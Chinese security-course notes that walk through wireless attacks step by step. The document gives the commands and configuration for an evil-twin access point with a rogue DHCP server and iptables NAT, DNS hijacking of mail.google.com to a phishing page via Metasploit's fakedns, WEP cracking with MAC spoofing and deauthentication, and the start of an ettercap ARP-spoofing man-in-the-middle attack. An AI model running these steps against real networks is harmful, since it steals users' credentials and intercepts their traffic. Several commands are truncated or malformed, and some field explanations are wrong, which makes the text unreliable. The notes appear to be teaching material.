信息系统安全导论文档

0

扯一点wifi 无线 协议 加密协议(WPA2 WPS标准) wifi常见的漏洞,

使用的工具和命令

aircrack-ng

airmon-ng 处理网卡工作模式
airodump-ng 抓包
aircrack-ng 破解
aireplay-ng 发包,干扰

ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)
iwlist 获取无线网络的更详细信息

airbase-ng搭建钓鱼wifi

准备工作

使用airbase-ng可以帮助我们建立soft AP

ifconfig -a 查看当前网卡
ifconfig wlan1 up 激活无线网卡

airmon-ng start wlan1 将无线网卡开启monitor模式

airbase-ng mon0 -e "name" -c 6

但是客户端就算连接到我们的伪AP后, 还是无法获得IP地址。

所以还需要对我们的伪AP架设一个伪DHCP服务器。

架设伪DHCP服务器

我们的伪DHCP服务器是和伪AP是搭建在同一个服务器上的, 在配置DHCP服务时,我们需要注意:

  1. 客户端在连接上我们的伪AP之后,我们需要给它分配IP地址
  2. DHCP配置文件中的DNS服务器IP要设置成我们的伪DNS地址
  3. DHCP配置文件中的默认网关地址要设置成我们的伪AP的IP地址,将目标客户端>的所有流量都劫持到我们的伪AP上,之后再通过iptables将流量导出到外网出口eth0
  4. SoftAP的IP地址和Internet接口的IP地址不能在网一个段(这里将伪AP的IP设置为10.0.0.1)

将网卡设置为静态IP

vim /etc/network/interfaces
auto eth0
#iface eth0 inet dhcp
iface eth0 inet static
address 192.168.159.254
gateway 192.168.159.2
netmask 255.255.255.0
ifdown eth0 
ifup eth0 
vim /etc/resolv.conf
nameserver 192.168.159.2

安装DHCP服务

sudo apt install dhcp3-server

如果遇到报错

解决方案

vim /etc/default/dhcp3-server
INTERFACES="at0"

cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf_backup
vim /etc/dhcp3/dhcpd.conf 

option domain-name "hanxiao";
option routers 10.0.0.1; #默认网关
subnet 10.0.0.0 netmask 255.255.255.0 
{
    range 10.0.0.100 10.0.0.200; #地址池 
    option domain-name-servers 10.0.0.1; #默认DNS
    option broadcast-address 10.0.0.255; #广播地址    
}
default-lease-time 6000;
max-lease-time 72000; 

启动伪AP, 激活at0网口

先启动伪AP

ifconfig wlan1 up
airmon-ng start wlan1
airbase-ng mon0 -e "name" -c 1

启动DHCP服务

重点关注的是网关的设置,我们的伪AP的IP地址也要设置成同样的IP地址, 达到劫持流量的目的。

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/dhcp3-server start

iptables 流量牵引

我们目前通过伪AP, 以及伪装DHCP服务的架设, 将目标客户端的流量都劫持到了我们的无限虚拟网卡at0上, 要保证用户正常上网, 还需要使用 iptables做一次流量牵引, 将at0上的流量NAT到真正的出口网卡eth0上, 这样才算真正的伪AP。

利用iptables的路由点Hook功能, 将at0上的流量和网口(eth0)做一个NAT,将流量牵引出去。

iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -o eth0 -j SNAT –to-source 192.168.159.254 
iptables -t nat -A PREROUTING -d 192.168.159.254 -i eth0 -j DNAT –to 10.0.0.100 

DNS配置

我们在DHCP服务器的配置文件中指定客户端的默认DNS为伪AP所在的本机(10.0.0.1)

所以,我们必须在10.0.0.1上架设一个DNS服务器,将客户端的DNS解析请求劫持到我们的的phning page(钓鱼页面)上
msf集成了一个模块,用于模拟一个DNS服务器
配置方法如下:

use auxiliary/server/fakedns
show options
set TARGETACTION FAKE
set TARGETDOMAIN mail.google.com
set TARGETHOST 10.0.0.1
run

从配置文件中我们可以看到,我们将mail.google.com(Gmail邮箱)的域名劫持到了10.0.0.1(本机上)
要注意的是: 1. fakedns这个msf模块只会劫持我们设置的域名,在本例中是mail.google.com

  1. 对于其他的非目标域名(即不是mail.google.com的域名)则采取转发的方式,即走本机正常的DNS解析流程,即保证目标客户端的正常上网
    客户端连接上我们的伪AP后,访问www.sina.cn是正常的

使用Aircrack-ng破解无线网络

无线网络的加密工具有哪些?

破解WEP加密的无线网络

具体操作如下:

1 使用airmon-ng命令查看当前系统中的无线网络接口。
2 修改wlan0接口的MAC地址, 因为MAC地址标识主机所在的网络, 在修改MAC地址之前, 需要停止该接口。

命令如下: airmon-ng stop wlan0
或者如下: ifconfig wlan0 down

执行以上命令使得wlan0接口停止了, 此时可以修改MAC地址了,命令如下:

macchanger --mac 00:11:22:33:44:55 wlan0

3 重新启动wlan0

命令如下: airmon-ng start wlan0

4 使用airodump 命令定位附近所有可用的无线网络:

命令如下: airodump-ng wlan0

输出的信息含义如下:
BSSID 无线的IP地址
PWR 网卡报告的信号水平
Beacons 无线发出的通告编号
#Data 被捕获到的数据分组的数量, 包括广播分组
** #/s ** 过去10秒钟内每秒捕获的数据分组的数量

5 使用airodump-ng 捕获指定BSSID的文件

airodump-ng命令常用的选项如下所示。

  • -c:指定选择的频道。
  • -w:指定一个文件名,用于保存捕获的数据。
  • -bssid:指定攻击的BSSID。

示例命令如下: airodump-ng -c wirelessattack -bssid Haddr

6 打开一个新的终端窗口,运行aireplay命令

airplay 命令的语法格式如下:

aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]

示例命令如下: aireplay-ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0

7 使用aireplay发送一些数据给无线路由器,以至于能捕获到数据

aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface]

示例命令:
aireplay-ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0

8 使用Aircrack破解密码

示例命令: `aircrack-ng -b Haddr

中间人攻击

中间人攻击, 缩写MITM攻击,(Man in the MiddleAttack) .

原理如下:

ARP协议: 一台主机和另一台主机在局域网内进行通信, 主机A需要知道主机B的MAC地址, 但是j局域网中的网卡并不能直接识别IP地址, 所以用ARP解析协议将IP地址解析成MAC地址,ARP(address resoluation protocol) 的基本功能就是通过目标设备的IP地址, 来查询目标设备的的MAC地址。

查询的过程是比较慢的, 所以为了节约时间,在局域网中的任何一台主机中,都有一个ARP缓存列表, 就是一组MAC地址和IP地址的对照关系。 这张表是有一定的生命周期的, 过了时限就会自动更新。一般不超过20分钟。

arp列表

回忆以下, 我们在计组课上讲cache的时候, 如果cache中的数据被修改了, 这个时候有几种方式, 比如写直达, 写缓存等, 来更新主存中的数据。 所以cache地址中引入了一个叫做脏位 dirty bit 的概念。

与之类比, 如果ARP中IP地址和MAC地址的映射关系修改了, 那么ARP缓存列表是肯定要更新的, 但是它又不是实时更新的, 这就为我们冒充局域网中的一台主机提供了方便。

攻击过程如下:

kali中内置了 ettercap
如果是其他Linux系统 sudo apt install ettercap-graphical

sudo ettercap -G 开启图形界面。


ettercap -G
ettercap
sniff
image.png
image.png
image.png
image.png
image.png
image.png

参考资料

kali搭建钓鱼wifi

你可能感兴趣的:(信息系统安全导论文档)